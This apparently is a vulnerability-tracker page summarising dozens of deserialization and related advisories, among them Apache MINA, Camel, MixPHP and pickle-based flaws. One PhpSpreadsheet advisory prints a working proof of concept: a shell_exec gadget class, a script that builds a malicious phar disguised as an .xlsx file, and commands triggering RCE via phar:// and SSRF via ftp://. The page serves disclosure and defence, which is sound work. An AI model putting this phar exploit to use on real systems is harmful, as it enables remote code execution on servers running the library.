### Summary Nerdbank.MessagePack contains an uncontrolled stack allocation vulnerability in DateTime decoding. A malicious MessagePack payload can declare an oversized timestamp extension length, causing the reader to allocate an attacker-controlled number of bytes on the stack. This can trigger a `StackOverflowException`, which is not catchable by user code and terminates the process. ### Impact Applications are impacted if they deserialize MessagePack data from untrusted or attacker-controlled sources using Nerdbank.MessagePack and the target type contains a `DateTime` value. A small malicious payload can cause process termination, resulting in a denial of service. This may affect services, APIs, workers, message consumers, or other long-running processes that deserialize untrusted MessagePack input. The issue occurs because DateTime timestamp extension decoding derives `tokenSize` from the attacker-controlled extension length before validating that the timestamp length is one of the legal MessagePack timestamp sizes: 4, 8, or 12 bytes. When the buffer is incomplete, that unvalidated size is propagated to the streaming reader slow path, where it is used in a `stackalloc`. ### Patches The 1.1.62 version contains the fix for this security vulnerability. ### Workarounds If upgrading is not yet possible, avoid deserializing untrusted MessagePack payloads into type graphs that may contain `DateTime` fields or properties. Input byte-size limits alone may not fully mitigate this issue, because the malicious payload can be small while declaring a very large extension length. Possible mitigations include: - Pre-validating MessagePack extension headers before deserialization and rejecting timestamp extensions whose length is not 4, 8, or 12 bytes. - Rejecting or filtering extension type `-1` timestamp values from untrusted input unless they are known to be valid. - Running deserialization of untrusted payloads in an isolated process that can be safely restarted after termination. - Restricting MessagePack deserialization to trusted producers until a patched version is available. ### Resources - CWE-789: Uncontrolled Memory Allocation: https://cwe.mitre.org/data/definitions/789.html - MessagePack timestamp extension specification: https://github.com/msgpack/msgpack/blob/master/spec.md#timestamp-extension-type

Denial Of Service Deserialization
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote denial of service in Apache OpenNLP versions before 2.5.9 and 3.0.0-M3 allows unauthenticated attackers to crash JVM processes by uploading malicious .bin model files that trigger OutOfMemoryError through unbounded array allocation. Exploitation requires no authentication (AV:N/AC:L/PR:N) and affects any code path deserializing binary model files from untrusted sources. EPSS score of 0.02% (5th percentile) suggests low widespread exploitation risk, and no active exploitation or public POC has been identified at time of analysis. Vendor-released patches are available with default safeguards limiting count fields to 10 million entries.

Denial Of Service Apache Deserialization +1
NVD VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Unsafe deserialization in MindsDB pickle.loads function allows authenticated remote attackers to achieve limited information disclosure and integrity compromise via crafted serialized objects. The vulnerability affects MindsDB up to version 26.01, requires valid credentials (PR:L), and has publicly available exploit code; however, the low CVSS score (2.1) and limited scope indicate restricted real-world impact despite network accessibility.

Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM This Month

Unsafe deserialization in SGLang's HuggingFace Transformer Handler allows remote attackers to trigger deserialization attacks via the get_tokenizer function in versions up to 0.5.9, potentially leading to code execution or information disclosure. The vulnerability requires high attack complexity and has not been patched despite early vendor notification.

Python Deserialization
NVD VulDB GitHub
EPSS 0% CVSS 8.1
HIGH This Week

Unauthenticated PHP object injection in Profile Builder Pro for WordPress allows remote attackers to execute arbitrary code by deserializing malicious objects through an unprotected AJAX endpoint. The vulnerability affects all versions through 3.14.5 and stems from unsafe deserialization of attacker-controlled POST data in the wppb_request_users_pins_action_callback() handler, which was registered for both authenticated and unauthenticated users without nonce verification. With CVSS 8.1 and AC:H complexity, exploitation requires chaining with a POP gadget chain, though EPSS data and KEV status are not available to confirm active exploitation.

PHP WordPress Deserialization
NVD VulDB
EPSS 0% CVSS 2.1
LOW POC PATCH Monitor

Unsafe pickle deserialization in mem0 up to version 1.0.11 allows authenticated remote attackers to execute arbitrary code via manipulation of the faiss.py vector store module. The vulnerability affects the pickle.load/pickle.dump functions used to serialize docstore data, enabling code execution with moderate impact (confidentiality, integrity, availability). Public exploit code is available, and vendor has released a patched version.

Deserialization Mem0
NVD VulDB GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Remote code execution in Apache MINA 2.1.0-2.1.11 and 2.2.0-2.2.6 allows unauthenticated attackers to execute arbitrary code via unsafe deserialization. The fix for prior CVE-2024-52046 was incomplete-the classname allowlist protecting IoBuffer.getObject() was applied too late, allowing malicious static initializers to execute before filtering. Confirmed actively exploited (CISA KEV). EPSS exploitation probability not provided, but the network-accessible, unauthenticated attack vector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N) combined with KEV status indicates immediate patching is critical for applications calling IoBuffer.getObject().

Apache Deserialization Red Hat
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Remote unauthenticated code execution in Apache MINA 2.1.0-2.1.11 and 2.2.0-2.2.6 allows attackers to bypass class allowlist protections via unsafe deserialization. The vulnerability exists because the fix for CVE-2026-41635 was not backported to the 2.1.X and 2.2.X branches, leaving AbstractIoBuffer.resolveClass() susceptible to arbitrary class instantiation when applications call IoBuffer.getObject(). Only applications actively using MINA's deserialization features are affected. EPSS data not available; no KEV listing or public POC identified at time of analysis.

Apache Deserialization RCE +1
NVD VulDB
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Unsafe deserialization in Zurich Instruments LabOne Q enables arbitrary code execution when users load malicious experiment files. The import_cls mechanism accepts unvalidated class names from serialized data, allowing attackers to instantiate arbitrary Python classes with controlled constructor arguments. Exploitation requires user interaction to open a crafted file, making this a credible vector for supply chain attacks via shared experiment configurations or support tickets. CVSS 8.4 reflects local attack vector with user interaction requirement. No confirmed active exploitation or public POC at time of analysis.

Python Deserialization RCE
NVD
EPSS 0% CVSS 8.4
HIGH This Week

Arbitrary code execution in MixPHP Framework 2.x through 2.2.17 allows local attackers to execute malicious PHP closures via unauthenticated TCP connections to the sync-invoke server. The vulnerability stems from unsafe deserialization of untrusted data on localhost-bound port 127.0.0.1, where Server.php directly passes socket data to Opis\Closure\unserialize() and executes the result without authentication or signature verification. Exploitation requires local network access or SSRF capability against the application server. No public exploit code identified at time of analysis, but the attack mechanism is straightforward for attackers with PHP deserialization knowledge.

PHP Deserialization RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote unauthenticated code execution in MixPHP Framework 2.x through 2.2.17 allows attackers to execute arbitrary PHP code by injecting malicious serialized objects into Redis-backed session or cache storage. The framework's RedisHandler directly deserializes untrusted data from Redis using PHP's unserialize() function without validation. CVSS 9.8 with network vector, low complexity, and no privileges required. EPSS and KEV status not provided; SSVC framework marks this as automatable with total technical impact, indicating high exploitability despite no confirmed active exploitation at time of analysis.

Redis Deserialization
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in MixPHP Framework 2.x through 2.2.17 allows unauthenticated network attackers to execute arbitrary code via unsafe deserialization. The FileHandler class processes session and cache data using PHP's unserialize() on filesystem-sourced content without validation, enabling object injection attacks. CVSS 9.8 critical severity with network attack vector and no privileges required. SSVC assessment confirms automatable exploitation with total technical impact. No active exploitation confirmed at time of analysis (not in CISA KEV), but publicly available proof-of-concept exists (GitHub gist reference).

Deserialization
NVD GitHub
EPSS 0% CVSS 8.1
HIGH POC This Week

Client-side remote code execution affects MixPHP Framework 2.x through 2.2.17 when sync-invoke clients connect to attacker-controlled servers. The vulnerability enables malicious servers to execute arbitrary code on connecting clients through unsafe deserialization of server responses (CWE-502). EPSS data unavailable, but SSVC indicates no confirmed exploitation and non-automatable attack complexity aligns with CVSS AC:H rating. Primary risk exists in scenarios where MixPHP clients connect to untrusted external services or where server infrastructure could be compromised.

PHP Deserialization
NVD GitHub Exploit-DB VulDB
EPSS 0% CVSS 9.3
CRITICAL Act Now

Remote code execution in Hyperledger fabric-sdk-java (all versions 1.0.0 through 2.2.26) allows unauthenticated attackers to execute arbitrary commands via malicious serialized Java objects. The deprecated SDK's Channel.java class deserializes untrusted byte arrays without input filtering in readObject() and deSerializeChannel() methods, enabling classic Java gadget chain exploitation. Publicly available exploit code exists (ysoserial toolkit), and exploitation requires only that an application accept Channel serialization data from attacker-controlled sources such as compromised files, external APIs, or injected parameters. EPSS data unavailable; not listed in CISA KEV. Vendor has published GHSA advisory but provides no patch-remediation requires migration to the replacement fabric-gateway SDK.

Deserialization Java
NVD GitHub
EPSS 0% CVSS 9.2
CRITICAL PATCH Act Now

The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

PHP Microsoft SSRF +1
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Jenkins Matrix Authorization Strategy Plugin 2.0-beta-1 through 3.2.9 (both inclusive) invokes parameterless constructors of classes specified in configuration when deserializing inheritance strategies, without restricting the classes that can be instantiated, allowing attackers with Item/Configure permission to instantiate arbitrary types, which may lead to information disclosure or other impacts depending on the classes available on the classpath.

Jenkins Information Disclosure Deserialization
NVD VulDB
EPSS 0% CVSS 1.3
LOW PATCH Monitor

A vulnerability was found in Grav CMS up to 1.7.49.5/2.0.0-beta.1. Affected by this vulnerability is the function FileCache::doGet of the file system/src/Grav/Framework/Cache/Adapter/FileCache.php of the component Cache Value Handler. The manipulation results in deserialization. The attack may be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made public and could be used. Upgrading to version 2.0.0-beta.2 addresses this issue. The patch is identified as c66dfeb5f. The affected component should be upgraded.

PHP Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in NVIDIA FLARE SDK allows authenticated attackers to execute arbitrary code by sending maliciously crafted FOBS-encoded messages that exploit unsafe deserialization in the FOBS component. The vulnerability affects federated learning deployments where NVIDIA FLARE SDK processes messages from low-privileged authenticated users, enabling complete system compromise with high impact to confidentiality, integrity, and availability. No active exploitation confirmed (not in CISA KEV) and public exploit status unknown at time of analysis.

Nvidia Deserialization RCE
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in StellarGroup HPX 1.11.0 allows unauthenticated attackers to execute arbitrary code through insecure deserialization of untrusted input. Publicly available exploit code exists (GitHub Gist POC) with CISA SSVC classifying this as automatable with total technical impact, though EPSS indicates only 2% probability of exploitation in the wild. The CWE-502 vulnerability enables complete system compromise when untrusted data is deserialized under specific deployment conditions not detailed in the description.

Deserialization RCE Hpx
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Insecure deserialization in Cista v0.15 and below allows remote unauthenticated attackers to leak stack and heap addresses through reference tampering in the cista::raw namespace, potentially defeating ASLR protections. The vulnerability arises from insufficient validation of pointer-like objects during deserialization, enabling attackers to observe deserialized values and extract memory layout information for subsequent exploitation.

Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

The ConsulRegistry in the camel-consul component (class org.apache.camel.component.consul.ConsulRegistry and its inner ConsulRegistryUtils.deserialize method) read Java-serialized values from the Consul KV store and passed them to ObjectInputStream.readObject() without configuring an ObjectInputFilter. An attacker who can write to the Consul KV store backing a Camel ConsulRegistry instance could inject a malicious serialized Java object that is deserialized the next time Camel performs a lookup against that registry, leading to arbitrary code execution in the Camel process. The issue mirrors the class of vulnerability already addressed for other Camel components in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747, and was overlooked during the original remediation of those CVEs. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.1.

RCE Java Deserialization +2
NVD VulDB
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\") or from(\"pop3://...\")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6.

Microsoft Deserialization Apache +1
NVD VulDB
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. The JIRA ticket: https://issues.apache.org/jira/browse/CAMEL-23322 refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.

RCE Java Atlassian +3
NVD VulDB GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Remote unauthenticated attackers can execute arbitrary code in Apache MINA 2.0.0-2.0.27, 2.1.0-2.1.10, and 2.2.0-2.2.5 through unsafe deserialization in AbstractIoBuffer.getObject(). This is an incomplete fix bypass for CVE-2024-52046 where the classname allowlist validation occurs after static initializers execute, enabling attackers to trigger malicious code execution before security controls engage. Apache confirmed the flaw affects applications calling IoBuffer.getObject() and released patches in versions 2.0.28, 2.1.11, and 2.2.6. CVSS 9.8 critical score reflects network-accessible unauthenticated exploitation with complete system compromise potential.

Deserialization Apache Red Hat
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Remote code execution in Apache MINA 2.0.0-2.0.27, 2.1.0-2.1.10, and 2.2.0-2.2.5 allows unauthenticated network attackers to execute arbitrary code by exploiting unsafe deserialization in AbstractIoBuffer.resolveClass(). The vulnerability bypasses classname allowlist protections due to incomplete validation of static classes and primitive types. CVSS 9.8 critical severity reflects trivial network-based exploitation requiring no authentication or user interaction. Applications using IoBuffer.getObject() are affected. Vendor-released patches available in versions 2.0.28, 2.1.11, and 2.2.6.

RCE Deserialization Apache +1
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6. This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

RCE Deserialization Apache +1
NVD VulDB
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted serialized Java object over the network to the MINA consumer port can trigger arbitrary code execution in the context of the application during readObject(). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

RCE Java Deserialization +2
NVD GitHub VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<keyId>.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.security.KeyPair` is evaluated only after `readObject()` has already returned, so any `readObject()` side effects in the deserialized object run before the type check. An attacker who can write to the key directory used by a Camel application - for example through a path traversal into the directory, misconfigured filesystem permissions on the volume where keys are stored, a compromised key provisioning pipeline, or a symlink attack - can place a crafted serialized Java object that, when deserialized during normal key lifecycle operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.19.0 before 4.20.0, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue by replacing java.io.ObjectInputStream-based key and metadata storage with standard PKCS#8 (private key) / X.509 SubjectPublicKeyInfo (public key) Base64 JSON encoding. For users on the 4.18.x LTS releases stream, upgrade to 4.18.2.

RCE Java Apache +3
NVD VulDB
EPSS 0% CVSS 7.4
HIGH PATCH This Week

Out-of-bounds memory read in Deskflow's clipboard deserialization allows authenticated remote peers to crash the application or potentially leak memory contents. The vulnerability affects versions prior to 1.26.0.138 and stems from insufficient validation of clipboard data structure during network transfer between connected machines. A malicious peer on the shared keyboard/mouse network can exploit this by sending specially crafted clipboard updates. CVSS 7.4 reflects network-based attack with low complexity requiring authenticated peer connection. No public exploit identified at time of analysis, though proof-of-concept code exists (CVSS E:P).

Buffer Overflow Deserialization Suse
NVD GitHub VulDB
EPSS 0% CVSS 8.9
HIGH PATCH This Week

Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. The vulnerability requires only that a victim read a crafted Parquet file from any source (cloud storage, HuggingFace datasets, shared filesystems)-no cluster access or authentication needed. This reintroduces a vulnerability class previously fixed in May 2024, making it a regression introduced in July 2025 (PR #54831). Working proof-of-concept exists demonstrating exploitation via HuggingFace datasets following Ray's own documentation. EPSS data not available, not currently in CISA KEV.

Python Code Injection Deserialization +1
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Apache NiFi TinkerpopClientService allows authenticated high-privilege users to execute arbitrary code without proper permission validation. The service fails to enforce required Execute Code permissions, enabling privilege escalation within the NiFi environment. While CVSS scores this at 7.5 (High), real-world risk requires authenticated high-privilege access (PR:H), significantly limiting the attack surface to compromised admin accounts or malicious insiders. No public exploit code has been identified, and CISA KEV does not list this vulnerability, suggesting no confirmed active exploitation at time of disclosure.

Authentication Bypass Apache Deserialization
NVD
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Tenant authorization bypass in Apache DolphinScheduler versions before 3.4.1 allows authenticated low-privilege users to execute workflows using arbitrary tenant configurations not assigned to their account, exposing high confidentiality and integrity risks. The vulnerability (CWE-863: Incorrect Authorization) enables privilege escalation through tenant context manipulation during workflow execution. Despite a CVSS score of 8.1, EPSS probability is low (0.02%, 4th percentile) with no active exploitation confirmed. Vendor patch is available in version 3.4.1.

Authentication Bypass Deserialization Apache
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Unsafe deserialization in Apache DolphinScheduler RPC module (versions 3.2.0 to 3.3.0) allows authenticated network attackers to achieve remote code execution by injecting malicious class types into StandardRpcRequest messages sent to Master or Worker nodes. The vulnerability requires network access and valid credentials but carries moderate CVSS (6.3) with very low EPSS exploitation probability (0.02%), suggesting limited real-world weaponization despite the dangerous vulnerability class.

Deserialization Apache
NVD VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Remote code execution in Ruby ERB library via unsafe deserialization allows unauthenticated attackers to execute arbitrary code by exploiting incomplete protection in Marshal.load workflows. While ERB 2.2.0+ added guards to prevent code execution during deserialization in result() and run() methods, the def_module(), def_method(), and def_class() methods remained unprotected, enabling attackers to bypass the @_init safeguard. Exploitation requires high complexity (AV:N/AC:H) as applications must deserialize untrusted Marshal data with ERB loaded. No EPSS or KEV data available; exploitation likelihood depends on prevalence of unsafe Marshal.load patterns in Ruby codebases.

Deserialization RCE Erb
NVD GitHub VulDB
EPSS 0% CVSS 10.0
CRITICAL PATCH NO ACTION HOSTED Monitor

Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network.

Microsoft Deserialization
NVD
EPSS 0% CVSS 9.3
CRITICAL POC PATCH Act Now

KTransformers through 0.5.3 contains an unsafe deserialization vulnerability in the balance_serve backend mode where the scheduler RPC server binds a ZMQ ROUTER socket to all interfaces with no authentication and deserializes incoming messages using pickle.loads() without validation. Attackers can send a crafted pickle payload to the exposed ZMQ socket to execute arbitrary code on the server with the privileges of the ktransformers process.

Deserialization RCE Ktransformers
NVD GitHub
EPSS 0% CVSS 9.3
CRITICAL Act Now

LeRobot contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the SendPolicyInstructions, SendObservations, or GetActions gRPC calls.

Deserialization RCE Lerobot
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. Versions 0.0.41 through 0.0.93 have a vulnerability in `LivekitFrameSerializer` - an optional, non-default, undocumented frame serializer class (now deprecated) intended for LiveKit integration. The class's `deserialize()` method uses Python's `pickle.loads()` on data received from WebSocket clients without any validation or sanitization. This means that a malicious WebSocket client can send a crafted pickle payload to execute arbitrary code on the Pipecat server. The vulnerable code resides in `src/pipecat/serializers/livekit.py` (around line 73), where untrusted WebSocket message data is passed directly into `pickle.loads()` for deserialization. If a Pipecat server is configured to use LivekitFrameSerializer and is listening on an external interface (e.g. 0.0.0.0), an attacker on the network (or the internet, if the service is exposed) could achieve remote code execution (RCE) on the server by sending a malicious pickle payload. Version 0.0.94 contains a fix. Users of Pipecat should avoid or replace unsafe deserialization and improve network security configuration. The best mitigation is to stop using the vulnerable LivekitFrameSerializer altogether. Those who require LiveKit functionality should upgrade to the latest Pipecat version and switch to the recommended `LiveKitTransport` or another secure method provided by the framework. Additionally, always follow secure coding practices: never trust client-supplied data, and avoid Python pickle (or similar unsafe deserialization) in network-facing components.

Python Deserialization RCE
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Code injection in Microsoft Kiota versions prior to 1.31.1 allows attackers who control or tamper with OpenAPI descriptions to inject malicious code into generated HTTP client libraries. Exploitation requires developers to generate clients from untrusted or compromised OpenAPI specifications, then compile and execute the poisoned code. The attack chain culminates in arbitrary code execution within the context of applications using the tainted generated clients. CVSS 7.3 with local attack vector and user interaction required suggests lower immediate urgency, though EPSS data is unavailable. No public exploit code or active exploitation confirmed at time of analysis.

Code Injection Deserialization RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 8.3
HIGH PATCH This Week

# Missing Admin Auth on Notification Target Endpoints in RustFS ### Finding Summary All four notification target admin API endpoints in `rustfs/src/admin/handlers/event.rs` use a `check_permissions` helper that validates authentication only (access key + session token), without performing any admin-action authorization via `validate_admin_request`. Every other admin handler in the codebase correctly calls `validate_admin_request` with a specific `AdminAction`. This is the only admin handler file that skips authorization. A non-admin user can overwrite a shared admin-defined notification target by name, causing subsequent bucket events to be delivered to an attacker-controlled endpoint. This enables cross-user event interception and audit evasion. ### What Was Proven Live 1. **Authorization bypass on all four endpoints** (03_readonly_user_bypass.py) - PUT, GET list, GET arns, DELETE all return 200 for readonly-user - Control routes (list-users, kms/status) correctly return 403 - Unauthenticated requests correctly rejected (403 Signature required) 2. **SSRF via health probe** (04_ssrf_listener_landing.py) - HEAD request from rustfs container to attacker-controlled listener - No host validation: only scheme check (http/https) 3. **Target hijacking and event exfiltration** (05_target_hijacking.py, 06_full_event_exfil.py) - Readonly-user overwrites admin-configured target URL by name - Subsequent S3 events delivered to attacker-controlled endpoint - Captured event body includes object keys, bucket names, user identities, and request metadata 4. **Audit evasion** (05_target_hijacking.py) - Readonly-user can delete unbound targets - Readonly-user can overwrite bound targets (silently redirecting events) ### Escalation Vectors Tested But Not Viable 1. **Self-referencing webhook to admin API** (13_self_referencing_test.py) - Webhook sends unsigned POST with event JSON body - Admin endpoints require SigV4 auth -- unsigned request rejected - "Confused deputy" via self-referencing does NOT work 2. **Protocol smuggling via non-HTTP targets** - Only 2 target types implemented: webhook and MQTT (`event.rs:613` enforces this) - No Redis, Kafka, AMQP, or other protocol targets exist - CRLF injection in webhook config fields sanitized by reqwest - MQTT uses rumqttc (pure Rust binary protocol client), no raw TCP injection 3. **MQTT target for RCE** - No unsafe code in MQTT handler - rumqttc 0.29.0 has no known public CVEs - No Command::new, template engines, or deserialization of broker responses 4. **Unauth access** - Endpoints correctly reject unauthenticated requests (403) - Endpoints correctly reject invalid credentials (403) ### Prior Art No existing advisory covers notification target endpoints. 11 published GHSAs on rustfs/rustfs cover different handlers. Closest: - CVE-2026-22042 (ImportIam wrong action constant) -- same bug class, different file - CVE-2026-22043 (deny_only short-circuit) -- different bug class ### Recommendation Submit via GitHub PVR. The finding is well-supported with live PoC, code references, and clear root cause. The fix is straightforward (add `validate_admin_request` calls to event.rs handlers). Core submission should reference 2-3 focused PoC scripts (readonly bypass, target hijack, event exfil), not the full set of 13 